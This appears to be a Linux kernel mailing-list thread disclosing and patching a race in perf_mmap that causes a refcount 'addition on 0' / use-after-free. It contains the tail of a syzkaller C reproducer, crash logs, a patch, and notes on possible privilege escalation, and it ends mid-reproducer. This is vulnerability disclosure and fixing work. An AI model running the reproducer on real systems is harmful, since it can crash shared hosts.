bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x8 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/(intptr_t)-1, /*flags=PERF_FLAG_FD_CLOEXEC*/ 8ul); if (res != -1) r[0] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x0 (8 bytes) // flags: mmap_flags = 0x11 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000002000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_SHARED*/ 0x11ul, /*fd=*/r[0], /*offset=*/0ul); // perf_event_open arguments: [ // attr: ptr[in, perf_event_attr] { // perf_event_attr { // type: perf_event_type = 0x2 (4 bytes) // size: len = 0x80 (4 bytes) // config0: int8 = 0x8 (1 bytes) // config1: int8 = 0x1 (1 bytes) // config2: int8 = 0x8 (1 bytes) // config3: int8 = 0x1 (1 bytes) // config4: const = 0x0 (4 bytes) // sample_freq: int64 = 0x2 (8 bytes) // sample_type: perf_sample_type = 0x84143 (8 bytes) // read_format: perf_read_format = 0x10 (8 bytes) // disabled: int64 = 0x1 (0 bytes) // inherit: int64 = 0x1 (0 bytes) // pinned: int64 = 0x1 (0 bytes) // exclusive: int64 = 0x0 (0 bytes) // exclude_user: int64 = 0x0 (0 bytes) // exclude_kernel: int64 = 0x1 (0 bytes) // exclude_hv: int64 = 0x1 (0 bytes) // exclude_idle: int64 = 0x1 (0 bytes) // mmap: int64 = 0x0 (0 bytes) // comm: int64 = 0x1 (0 bytes) // freq: int64 = 0x0 (0 bytes) // inherit_stat: int64 = 0x0 (0 bytes) // enable_on_exec: int64 = 0x0 (0 bytes) // task: int64 = 0x1 (0 bytes) // watermark: int64 = 0x0 (0 bytes) // precise_ip: int64 = 0x3 (0 bytes) // mmap_data: int64 = 0x1 (0 bytes) // sample_id_all: int64 = 0x1 (0 bytes) // exclude_host: int64 = 0x0 (0 bytes) // exclude_guest: int64 = 0x0 (0 bytes) // exclude_callchain_kernel: int64 = 0x1 (0 bytes) // exclude_callchain_user: int64 = 0x0 (0 bytes) // mmap2: int64 = 0x1 (0 bytes) // comm_exec: int64 = 0x1 (0 bytes) // use_clockid: int64 = 0x0 (0 bytes) // context_switch: int64 = 0x0 (0 bytes) // write_backward: int64 = 0x1 (0 bytes) // namespaces: int64 = 0x0 (0 bytes) // ksymbol: int64 = 0x0 (0 bytes) // bpf_event: int64 = 0x1 (0 bytes) // aux_output: int64 = 0x0 (0 bytes) // cgroup: int64 = 0x0 (0 bytes) // text_poke: int64 = 0x0 (0 bytes) // build_id: int64 = 0x0 (0 bytes) // inherit_thread: int64 = 0x1 (0 bytes) // remove_on_exec: int64 = 0x0 (0 bytes) // sigtrap: int64 = 0x0 (0 bytes) // __reserved_1: const = 0x0 (8 bytes) // wakeup_events: int32 = 0x7fff (4 bytes) // bp_type: perf_bp_type = 0x2 (4 bytes) // bp_config: union perf_bp_config { // perf_config_ext: perf_config_ext { // config1: int64 = 0x29a (8 bytes) // config2: int64 = 0x8 (8 bytes) // } // } // branch_sample_type: perf_branch_sample_type = 0x1800 (8 bytes) // sample_regs_user: int64 = 0x7 (8 bytes) // sample_stack_user: int32 = 0x10000 (4 bytes) // clockid: clock_type = 0x1 (4 bytes) // sample_regs_intr: int64 = 0x4 (8 bytes) // aux_watermark: int32 = 0xffffff7f (4 bytes) // sample_max_stack: int16 = 0xfffe (2 bytes) // __reserved_2: const = 0x0 (2 bytes) // aux_sample_size: int32 = 0x8000003 (4 bytes) // __reserved_3: const = 0x0 (4 bytes) // sig_data: int64 = 0x7 (8 bytes) // } // } // pid: pid (resource) // cpu: intptr = 0x1 (8 bytes) // group: fd_perf (resource) // flags: perf_flags = 0x2 (8 bytes) // ] // returns fd_perf NONFAILING(*(uint32_t*)0x200000000000 = 2); NONFAILING(*(uint32_t*)0x200000000004 = 0x80); NONFAILING(*(uint8_t*)0x200000000008 = 8); NONFAILING(*(uint8_t*)0x200000000009 = 1); NONFAILING(*(uint8_t*)0x20000000000a = 8); NONFAILING(*(uint8_t*)0x20000000000b = 1); NONFAILING(*(uint32_t*)0x20000000000c = 0); NONFAILING(*(uint64_t*)0x200000000010 = 2); NONFAILING(*(uint64_t*)0x200000000018 = 0x84143); NONFAILING(*(uint64_t*)0x200000000020 = 0x10); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 0, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 1, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 2, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 3, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 4, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 5, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 6, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 7, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 8, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 9, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 10, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 11, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 12, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 13, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 14, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 3, 15, 2)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 17, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 18, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 19, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 20, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 21, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 22, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 23, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 24, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 25, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 26, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 27, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 28, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 29, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 30, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 31, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 32, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 33, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 34, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 1, 35, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 36, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 37, 1)); NONFAILING(STORE_BY_BITMASK(uint64_t, , 0x200000000028, 0, 38, 26)); NONFAILING(*(uint32_t*)0x200000000030 = 0x7fff); NONFAILING(*(uint32_t*)0x200000000034 = 2); NONFAILING(*(uint64_t*)0x200000000038 = 0x29a); NONFAILING(*(uint64_t*)0x200000000040 = 8); NONFAILING(*(uint64_t*)0x200000000048 = 0x1800); NONFAILING(*(uint64_t*)0x200000000050 = 7); NONFAILING(*(uint32_t*)0x200000000058 = 0x10000); NONFAILING(*(uint32_t*)0x20000000005c = 1); NONFAILING(*(uint64_t*)0x200000000060 = 4); NONFAILING(*(uint32_t*)0x200000000068 = 0xffffff7f); NONFAILING(*(uint16_t*)0x20000000006c = 0xfffe); NONFAILING(*(uint16_t*)0x20000000006e = 0); NONFAILING(*(uint32_t*)0x200000000070 = 0x8000003); NONFAILING(*(uint32_t*)0x200000000074 = 0); NONFAILING(*(uint64_t*)0x200000000078 = 7); res = syscall(__NR_perf_event_open, /*attr=*/0x200000000000ul, /*pid=*/0, /*cpu=*/1ul, /*group=*/r[0], /*flags=PERF_FLAG_FD_OUTPUT*/ 2ul); if (res != -1) r[1] = res; // mmap arguments: [ // addr: VMA[0x1000] // len: len = 0x1000 (8 bytes) // prot: mmap_prot = 0x100000b (8 bytes) // flags: mmap_flags = 0x13 (8 bytes) // fd: fd (resource) // offset: intptr = 0x0 (8 bytes) // ] syscall(__NR_mmap, /*addr=*/0x200000186000ul, /*len=*/0x1000ul, /*prot=PROT_GROWSDOWN|PROT_SEM|PROT_WRITE|PROT_READ*/ 0x100000bul, /*flags=MAP_SHARED_VALIDATE|MAP_FIXED*/ 0x13ul, /*fd=*/r[1], /*offset=*/0ul); return 0; }
Hi Peter, Thanks for the review. You are right, my previous explanation was inaccurate. The actual race condition occurs between a failing mmap() on one event and a concurrent mmap() on a second event that shares the ring buffer (e.g., via output redirection). Detailed scenario is as follows, for example: 1. Thread A calls mmap(event_A). It allocates the ring buffer, sets event_A->rb, and initializes refcount to 1. It then drops mmap_mutex. 2. Thread A calls map_range(). Suppose this fails. Thread A then proceeds to the error path and calls perf_mmap_close(). 3. Thread B concurrently calls mmap(event_B), where event_B is configured to share event_A's buffer. Thread B acquires event_A->mmap_mutex and sees the valid event_A->rb pointer. 4. The race triggers here: If Thread A's perf_mmap_close() logic decrements the ring buffer's refcount to 0 (releasing it) but the pointer event_A->rb is still visible to Thread B (or was read by Thread B before it was cleared), Thread B triggers the "refcount_t: addition on 0" warning when it attempts to increment the refcount in perf_mmap_rb(). The fix extends the scope of mmap_mutex to cover map_range() and the potential error handling path. This ensures that event->rb is only exposed to other threads after it is fully successfully mapped, or it is cleaned up atomically inside the lock if mapping fails. I have updated the commit message accordingly. Thanks, Haocheng
{ "author": "=?UTF-8?B?5L2Z5piK6ZOW?= <yuhaocheng035@gmail.com>", "date": "Mon, 2 Feb 2026 23:51:28 +0800", "thread_id": "20260202162057.7237-1-yuhaocheng035@gmail.com.mbox.gz" }
lkml
[PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap
Hello, I would like to report a reference counting vulnerability in the Linux kernel perf_event subsystem, which I discovered using a modified syzkaller-based kernel fuzzing tool that I developed. Summary ------- A local user can trigger a reference count saturation or a use-after-free (UAF) vulnerability in the perf_mmap function. This is caused by a race condition where a ring_buffer object's reference count is incremented after it has already reached zero. The vulnerability exists in the perf_mmap() function in kernel/events/core.c. While the function uses mmap_mutex to protect the initial buffer setup, it performs subsequent operations (such as map_range) on event->rb outside of the locked scope. If the event is closed or the buffer is detached concurrently, the reference count of the ring_buffer can drop to zero, leading to an 'addition on 0' warning or a UAF when the kernel attempts to access or increment it later. I verified this on Linux kernel version 6.18.5. Environment ----------- - Kernel version: 6.18.5 (the complete config is attached) - Architecture: x86_64 - Hypervisor: QEMU (Standard PC i440FX + PIIX, BIOS 1.13.0-1ubuntu1.1) Symptoms and logs ----------------- The kernel triggers a 'refcount_t: addition on 0; use-after-free' warning followed by a memory leak warning The full report is as below: audit: type=1400 audit(1769676568.351:202): avc: denied { open } for pid=21484 comm="syz.6.2386" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 3 PID: 21486 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 3 UID: 0 PID: 21486 Comm: syz.6.2386 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 5c b8 e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff888103c17678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff888107641190 RCX: ffffffff8137110c RDX: 0000000000080000 RSI: ffffc90002279000 RDI: ffff88811b3a3e88 RBP: 0000000000000002 R08: fffffbfff7219644 R09: ffffed10236747d2 R10: ffffed10236747d1 R11: ffff88811b3a3e8b R12: 0000000000000000 R13: ffff888002255a10 R14: ffff888002255a00 R15: ffff888107641170 FS: 00007f7ef46f3640(0000) GS:ffff888160a03000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000478 CR3: 000000010698c006 CR4: 0000000000770ff0 DR0: 0000000000000000 DR1: 00000200000000a2 DR2: 00000200000000a2 DR3: 00000200000000a2 DR6: 00000000ffff0ff0 DR7: 0000000000000600 PKRU: 80000000 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7ef5cabb9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7ef46f2fc8 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f7ef5f01fa0 RCX: 00007f7ef5cabb9d RDX: 0000000001000003 RSI: 0000000000002000 RDI: 0000200000ffa000 RBP: 00007f7ef5d2f00a R08: 0000000000000007 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 00007f7ef5f01fac R14: 00007f7ef5f02038 R15: 00007f7ef46f3640 </TASK> ---[ end trace 0000000000000000 ]--- EXT4-fs error (device loop0): ext4_mb_generate_buddy:1303: group 0, block bitmap and bg descriptor inconsistent: 219 vs 12386523 free clusters EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 1 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost EXT4-fs (loop0): Total free blocks count 0 EXT4-fs (loop0): Free/Dirty block details EXT4-fs (loop0): free_blocks=12386304 EXT4-fs (loop0): dirty_blocks=16387 EXT4-fs (loop0): Block reservation details EXT4-fs (loop0): i_reserved_data_blocks=16387 EXT4-fs (loop0): Delayed block allocation failed for inode 15 at logical offset 2052 with max blocks 2048 with error 28 EXT4-fs (loop0): This should not happen!! Data will be lost <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> SYZFAIL: failed to recv rpc fd=3 want=4 recv=0 n=0 (errno 9: Bad file descriptor) <<<<<<<<<<<<<<< tail report >>>>>>>>>>>>>>> Reproduce ---------- The issue is reproducible using the C reproducer attached. The reproducer triggers the vulnerability by creating a high-frequency race condition between memory mapping and event teardown. The reproducer follows this execution flow: 1. Event Creation: It initializes a performance monitoring event via perf_event_open(), typically with inherit or specific sample_type flags that necessitate the allocation of a kernel ring_buffer. 2. Multithreaded Hammering: The program spawns multiple threads or forks child processes to perform concurrent operations on the same file descriptor. 3. The Race: Thread A continuously calls mmap() on the perf file descriptor. This enters the kernel-side perf_mmap() function, which briefly acquires the mmap_mutex to set up the buffer but then drops it. While thread B (or the main loop) attempts to close the descriptor or modify the event state, which can trigger the destruction or detachment of the ring_buffer. 4. Vulnerability Trigger: Because perf_mmap() accesses event->rb to perform map_range() after the mmap_mutex has been released, Thread B can drop the buffer's reference count to zero during this unprotected window. 5. Crash/Warning: When Thread A finally reaches the code that increments the reference count or accesses the buffer (e.g., in perf_mmap_rb or map_range), the refcount_t infrastructure detects an "addition on 0," resulting in the KASAN or refcount_warn_saturate report. Security impact --------------- The vulnerability allows a local user to compromise system integrity by triggering a reference count saturation or a Use-After-Free (UAF) condition. While the immediate symptom is typically a kernel warning or a Denial of Service through a system hang or panic, especially in environments with panic_on_warn enabled, the underlying memory corruption represents a more significant threat. By causing a ring_buffer object to be accessed after its reference count has reached zero, an attacker may be able to leverage this UAF state to perform heap grooming. If the freed memory is reallocated with a controlled structure, it could potentially be exploited to achieve local privilege escalation, making this a critical issue for multi-user systems or containerized environments where the perf_event interface is accessible. Patch -------------- From 34545a4d43adef3147e0ba1c744deb128a05a101 Mon Sep 17 00:00:00 2001 From: 0ne1r0s <yuhaocheng035@gmail.com> Date: Sat, 31 Jan 2026 21:16:52 +0800 Subject: [PATCH] perf/core: Fix refcount bug and potential UAF in perf_mmap The issue is caused by a race condition between mmap() and event teardown. In perf_mmap(), the ring_buffer (rb) is accessed via map_range() after the mmap_mutex is released. If another thread closes the event or detaches the buffer during this window, the reference count of rb can drop to zero, leading to a UAF or refcount saturation when map_range() or subsequent logic attempts to use it. Fix this by extending the scope of mmap_mutex to cover the entire setup process, including map_range(), ensuring the buffer remains valid until the mapping is complete. Signed-off-by: 0ne1r0s <yuhaocheng035@gmail.com> --- kernel/events/core.c | 42 +++++++++++++++++++++--------------------- 1 file changed, 21 insertions(+), 21 deletions(-) diff --git a/kernel/events/core.c b/kernel/events/core.c index 2c35acc2722b..7c93f7d057cb 100644 --- a/kernel/events/core.c +++ b/kernel/events/core.c @@ -7167,28 +7167,28 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma) ret = perf_mmap_aux(vma, event, nr_pages); if (ret) return ret; - } - - /* - * Since pinned accounting is per vm we cannot allow fork() to copy our - * vma. - */ - vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); - vma->vm_ops = &perf_mmap_vmops; - mapped = get_mapped(event, event_mapped); - if (mapped) - mapped(event, vma->vm_mm); - - /* - * Try to map it into the page table. On fail, invoke - * perf_mmap_close() to undo the above, as the callsite expects - * full cleanup in this case and therefore does not invoke - * vmops::close(). - */ - ret = map_range(event->rb, vma); - if (ret) - perf_mmap_close(vma); + /* + * Since pinned accounting is per vm we cannot allow fork() to copy our + * vma. + */ + vm_flags_set(vma, VM_DONTCOPY | VM_DONTEXPAND | VM_DONTDUMP); + vma->vm_ops = &perf_mmap_vmops; + + mapped = get_mapped(event, event_mapped); + if (mapped) + mapped(event, vma->vm_mm); + + /* + * Try to map it into the page table. On fail, invoke + * perf_mmap_close() to undo the above, as the callsite expects + * full cleanup in this case and therefore does not invoke + * vmops::close(). + */ + ret = map_range(event->rb, vma); + if (ret) + perf_mmap_close(vma); + } return ret; } -- 2.51.0 Request ------- Could you please review this issue and the proposed fix? If this is a confirmed new vulnerability, I would appreciate coordination on a CVE ID. Best regards, Haocheng Yu Zhejiang UniversitySyzkaller hit 'WARNING: refcount bug in perf_mmap' bug. audit: type=1400 audit(1769331402.322:11): avc: denied { read } for pid=1256 comm="syz.3.17" scontext=system_u:system_r:kernel_t:s0 tcontext=system_u:system_r:kernel_t:s0 tclass=perf_event permissive=1 ------------[ cut here ]------------ refcount_t: addition on 0; use-after-free. WARNING: CPU: 0 PID: 1256 at lib/refcount.c:25 refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Modules linked in: CPU: 0 UID: 0 PID: 1256 Comm: syz.3.17 Not tainted 6.18.5 #1 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 RIP: 0010:refcount_warn_saturate+0x13c/0x1b0 lib/refcount.c:25 Code: f0 40 ff 80 3d 70 44 61 03 00 0f 85 52 ff ff ff e8 c9 f0 40 ff c6 05 5e 44 61 03 01 90 48 c7 c7 80 43 7c 9a e8 75 5d 0f ff 90 <0f> 0b 90 90 e9 2f ff ff ff e8 a6 f0 40 ff 80 3d 3d 44 61 03 00 0f RSP: 0018:ffff8881036bf678 EFLAGS: 00010286 RAX: 0000000000000000 RBX: ffff8881027387c0 RCX: ffffffff9757110c RDX: ffff888102cb4800 RSI: 0000000000000008 RDI: ffff88811b228000 RBP: 0000000000000002 R08: fffffbfff3659644 R09: ffffed10206d7e8c R10: ffffed10206d7e8b R11: ffff8881036bf45f R12: 0000000000000000 R13: ffff88810e816310 R14: ffff88810e816300 R15: ffff8881027387a0 FS: 000055558ca3a540(0000) GS:ffff88817e683000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000200000000078 CR3: 000000010406c005 CR4: 0000000000770ff0 PKRU: 55555554 Call Trace: <TASK> __refcount_add include/linux/refcount.h:289 [inline] __refcount_inc include/linux/refcount.h:366 [inline] refcount_inc include/linux/refcount.h:383 [inline] perf_mmap_rb kernel/events/core.c:7005 [inline] perf_mmap+0x126d/0x1990 kernel/events/core.c:7163 vfs_mmap include/linux/fs.h:2405 [inline] mmap_file mm/internal.h:167 [inline] __mmap_new_file_vma mm/vma.c:2413 [inline] __mmap_new_vma mm/vma.c:2476 [inline] __mmap_region+0xea5/0x2250 mm/vma.c:2670 mmap_region+0x267/0x350 mm/vma.c:2740 do_mmap+0x769/0xe50 mm/mmap.c:558 vm_mmap_pgoff+0x1e1/0x330 mm/util.c:581 ksys_mmap_pgoff+0x35d/0x4b0 mm/mmap.c:604 __do_sys_mmap arch/x86/kernel/sys_x86_64.c:89 [inline] __se_sys_mmap arch/x86/kernel/sys_x86_64.c:82 [inline] __x64_sys_mmap+0x116/0x180 arch/x86/kernel/sys_x86_64.c:82 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xac/0x2a0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f4a5add3b9d Code: 02 b8 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b0 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007ffe1d5a4a68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009 RAX: ffffffffffffffda RBX: 00007f4a5b029fa0 RCX: 00007f4a5add3b9d RDX: 000000000100000b RSI: 0000000000001000 RDI: 0000200000186000 RBP: 00007f4a5ae5700a R08: 0000000000000004 R09: 0000000000000000 R10: 0000000000000013 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 0000000000001067 R15: 00007f4a5b029fa0 </TASK> ---[ end trace 0000000000000000 ]--- Syzkaller reproducer: # {Threaded:false Repeat:false RepeatTimes:0 Procs:1 Slowdown:1 Sandbox: SandboxArg:0 Leak:false NetInjection:false NetDevices:false NetReset:false Cgroups:false BinfmtMisc:false CloseFDs:false KCSAN:false DevlinkPCI:false NicVF:false USB:false VhciInjection:false Wifi:false IEEE802154:false Sysctl:false Swap:false UseTmpDir:false HandleSegv:true Trace:false CallComments:true LegacyOptions:{Collide:false Fault:false FaultCall:0 FaultNth:0}} pkey_mprotect(&(0x7f0000000000/0x2000)=nil, 0x2000, 